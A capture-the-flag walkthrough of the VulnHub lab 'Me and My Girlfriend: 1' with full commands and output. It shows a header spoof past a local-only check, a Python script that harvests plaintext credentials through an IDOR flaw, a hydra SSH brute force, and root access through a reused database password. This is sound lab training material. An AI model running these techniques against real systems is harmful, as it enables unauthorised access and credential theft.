Author: jason huawen
Name: Me and My Girlfriend: 1
URL:
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:61:8a:f1 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:87:26:b3 1 60 PCS Systemtechnik GmbH
Kali's netdiscover identifies the target host's IP address as 192.168.56.254.
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57e15658460433563dc34ba793ee2316 (DSA)
| 2048 3b264de4a03bf875d96e1555828c7197 (RSA)
| 256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_ 256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
The nmap scan shows two open ports on the target: 22 (ssh) and 80 (http).
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->
The site claims it can only be accessed locally, and the HTML comment hints at the X-Forwarded-For request header: the "local only" check trusts that header rather than the real client address.
Intercept the request in Burp Suite and add the header X-Forwarded-For: 127.0.0.1 so the application believes the request comes from localhost.
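The following is an added example, not code from the original writeup or from the VulnHub box. It reconstructs why the X-Forwarded-For hint works: a "local only" gate that believes the client-supplied header instead of the TCP peer address. The server-side PHP is not shown on the page, so the gate logic is an assumption; the hardened version is the fix a reviewer would ask for, and spoofed_curl() is the curl equivalent of the Burp edit.

```python
"""Added example (not from the original writeup or the box): a 'local only'
gate that trusts X-Forwarded-For, beside the hardened form. The server code
on the target is not shown on the page, so this gate is an assumption."""
import shlex

LOCAL_ADDRS = {"127.0.0.1", "::1"}


def vulnerable_is_local(remote_addr, headers):
    """Trusts X-Forwarded-For outright: whoever sends the header picks the
    address that gets checked, so any remote client can claim 127.0.0.1."""
    forwarded = headers.get("X-Forwarded-For")
    client_ip = forwarded.split(",")[0].strip() if forwarded else remote_addr
    return client_ip in LOCAL_ADDRS


def hardened_is_local(remote_addr, headers, trusted_proxies=frozenset()):
    """Honours X-Forwarded-For only when the TCP peer is a proxy we operate,
    and then takes the rightmost entry (the one that proxy appended); a
    client-supplied value further left is ignored. With no trusted proxy,
    the socket address is the only thing that counts."""
    forwarded = headers.get("X-Forwarded-For")
    if forwarded and remote_addr in trusted_proxies:
        client_ip = forwarded.split(",")[-1].strip()
    else:
        client_ip = remote_addr
    return client_ip in LOCAL_ADDRS


def spoofed_curl(target, path="/"):
    """The curl equivalent of the Burp edit: one header added to the request."""
    return ["curl", "-s", "-H", "X-Forwarded-For: 127.0.0.1",
            f"http://{target}{path}"]


if __name__ == "__main__":
    attacker = "192.168.56.1"          # Kali's address on the host-only network
    spoof = {"X-Forwarded-For": "127.0.0.1"}
    print("vulnerable gate, spoofed header:", vulnerable_is_local(attacker, spoof))
    print("hardened gate,   spoofed header:", hardened_is_local(attacker, spoof))
    print(shlex.join(spoofed_curl("192.168.56.254")))
```

The hardened check also defeats the usual second trick, a client prepending its own value before a real proxy appends the true source: only the rightmost, proxy-added entry is read, and only when the peer really is that proxy.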
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/robots.txt
User-Agent: *
Allow: /heyhoo.txt
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/heyhoo.txt
Great! What you need now is reconn, attack and got the shell

With that header the page now loads.
Editing every request in Burp Suite is tedious; a browser extension that spoofs the X-Forwarded-For header makes the rest of the browsing easier.
Judging from the URL, could there be a local file inclusion vulnerability?
http://192.168.56.254/index.php?page=login
Testing it returned nothing, but also no error.
The PHP filter wrapper did not work either:
http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index
Next, intercept a request in Burp Suite, save it to a file, and run sqlmap against it to check for SQL injection:
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sqlmap -r req.txt --level=5
sqlmap found no SQL injection.
Next, register a user named test and log in as test to see what turns up.
Note the URL after logging in:
http://192.168.56.254/index.php?page=dashboard&user_id=14
Can we change the user_id value to reach other users' data (a horizontal privilege escalation, i.e. an IDOR)?
Set user_id=1 and open the profile.
Viewing the page source reveals the user's plaintext password, which the form echoes back into the password field:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Ceban Corp</title>
<style>
.center {
text-align: center;
}
</style>
</head>
<body>
<div class="center">
<h2>Welcome To Ceban Corp</h2>
<p>Inspiring The People To Great Again!</p>
<hr>
<p><a href="?page=dashboard">Dashboard</a> | <a href="?page=profile&user_id=14">Profile</a> | <a href="?page=logout">Logout</a></p>
<hr>
</div>
<form action="#" method="POST">
<label for="name">Name</label>
<input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
<label for="username">Username</label>
<input type="text" name="username" id="username" value="eweuhtandingan"><br>
<label for="password">Password</label>
<input type="password" name="password" id="password" value="skuyatuh"><br>
<button disabled="disabled">Change</button>
</form>
</body>
</html>
Are that username and password also the SSH credentials? The attempt fails, so collect every user's username and password by enumerating user_id from 1 upward until a profile no longer returns any content:
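The enumeration just described, as an added example that is not part of the original writeup: it walks index.php?page=profile&user_id=N with the X-Forwarded-For bypass and pulls name/username/password out of each profile form. The session cookie name (PHPSESSID) and the stop rule (three consecutive empty profiles, since ids can have gaps) are assumptions; the form layout matches the profile HTML above, and SAMPLE_PROFILE is a constructed copy of it used for offline testing.

```python
"""Added example, not from the original writeup: automate the IDOR walk
(index.php?page=profile&user_id=N) and build hydra wordlists from it.
PHPSESSID as the cookie name and the stop rule are assumptions."""
import re
import sys
import urllib.request

FIELD_RE = re.compile(r'name="(name|username|password)"[^>]*\bvalue="([^"]*)"')

# Constructed sample, trimmed from the profile page shown in this writeup.
SAMPLE_PROFILE = """
<form action="#" method="POST">
<label for="name">Name</label>
<input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
<label for="username">Username</label>
<input type="text" name="username" id="username" value="eweuhtandingan"><br>
<label for="password">Password</label>
<input type="password" name="password" id="password" value="skuyatuh"><br>
<button disabled="disabled">Change</button>
</form>
"""


def extract_credentials(html):
    """Return {'name', 'username', 'password'} from a profile form, or None
    when the page carries no populated form (an unused user_id)."""
    fields = dict(FIELD_RE.findall(html))
    if not fields.get("username"):
        return None
    return {key: fields.get(key, "") for key in ("name", "username", "password")}


def fetch_profile(target, user_id, session_id):
    """One authenticated request carrying the local-only bypass header."""
    url = f"http://{target}/index.php?page=profile&user_id={user_id}"
    req = urllib.request.Request(url, headers={
        "X-Forwarded-For": "127.0.0.1",
        "Cookie": f"PHPSESSID={session_id}",   # assumed cookie name
    })
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_profiles(fetch, start=1, max_misses=3, limit=200):
    """fetch(user_id) -> html. Ids may have gaps (deleted accounts), so stop
    only after max_misses consecutive empty profiles, not at the first one."""
    found, misses = {}, 0
    for uid in range(start, start + limit):
        creds = extract_credentials(fetch(uid))
        if creds is None:
            misses += 1
            if misses >= max_misses:
                break
            continue
        misses = 0
        found[uid] = creds
    return found


def to_wordlists(found):
    """users.dict / pass.dict contents for hydra: de-duplicated, order kept."""
    users = list(dict.fromkeys(c["username"] for c in found.values()))
    passwords = list(dict.fromkeys(c["password"] for c in found.values()))
    return users, passwords


if __name__ == "__main__":
    # usage: python3 idor_enum.py 192.168.56.254 <PHPSESSID value>
    target, session_id = sys.argv[1], sys.argv[2]
    found = enumerate_profiles(lambda uid: fetch_profile(target, uid, session_id))
    for uid, creds in sorted(found.items()):
        print(uid, creds["username"], creds["password"])
    users, passwords = to_wordlists(found)
    with open("users.dict", "w") as f:
        f.write("\n".join(users) + "\n")
    with open("pass.dict", "w") as f:
        f.write("\n".join(passwords) + "\n")
```

The two wordlists it writes are the users.dict and pass.dict fed to hydra below; because the passwords are paired with their usernames, a per-user attempt would be enough, but spraying every password against every user also catches reuse across accounts.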
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh eweuhtandingan@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
eweuhtandingan@192.168.56.254's password:
Permission denied, please try again.
eweuhtandingan@192.168.56.254's password:
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat users.dict
eweuhtandingan
aingmaung
sundatea
sedihaingmah
alice
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat pass.dict
skuyatuh
qwerty!!!
indONEsia
cedihhihihi
4lic3
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.254:22/
[22][ssh] host: 192.168.56.254 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh alice@192.168.56.254
alice@192.168.56.254's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:~$ ls -alh
total 32K
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 .
drwxr-xr-x 6 root root 4.0K Dec 13 2019 ..
-rw------- 1 alice alice 10 Dec 13 2019 .bash_history
-rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
-rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc
drwx------ 2 alice alice 4.0K Dec 13 2019 .cache
drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret
-rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
alice@gfriEND:~$ cat .bash_history
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -alh
total 16K
drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 ..
-rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt
-rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:~/.my_secret$ cd /home
alice@gfriEND:/home$ ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Dec 13 2019 .
drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
drwxr-xr-x 2 aingmaung aingmaung 4.0K Dec 13 2019 aingmaung
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 alice
drwxr-xr-x 2 eweuhtandingan eweuhtandingan 4.0K Dec 13 2019 eweuhtandingan
drwxr-xr-x 2 sundatea sundatea 4.0K Dec 13 2019 sundatea
That is the first flag. Next, look at the web application's configuration under /var/www/html:
alice@gfriEND:/var/www/html$ cd config
alice@gfriEND:/var/www/html/config$ ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Dec 13 2019 .
drwxr-xr-x 5 root root 4.0K Dec 13 2019 ..
-rw-rw-r-- 1 root root 88 Dec 13 2019 config.php
alice@gfriEND:/var/www/html/config$ cat config.php
<?php
$conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ su - root
Password:
root@gfriEND:~# cd /root
root@gfriEND:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Dec 13 2019 .
drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
-rw------- 1 root root 0 Dec 13 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
drwx------ 2 root root 4.0K Dec 13 2019 .cache
-rw-r--r-- 1 root root 1000 Dec 13 2019 flag2.txt
-rw------- 1 root root 238 Dec 13 2019 .mysql_history
-rw------- 1 root root 81 Dec 13 2019 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
root@gfriEND:~# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~#
That gives a root shell and the root flag. Privilege escalation on this box is straightforward: the MySQL root password stored in config.php also works for su - root, a credential-reuse misconfiguration that a careful look at the web root turns up.